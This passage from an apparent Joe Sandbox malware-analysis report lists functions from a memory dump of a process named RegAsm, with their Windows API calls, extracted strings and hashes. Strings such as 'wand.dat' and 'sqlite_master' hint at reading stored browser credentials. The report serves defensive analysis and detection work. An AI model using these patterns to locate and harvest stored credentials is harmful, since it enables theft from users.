                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                      Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                      • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                      Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                      Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                      Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                      Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                                                                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                      • Opcode ID: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
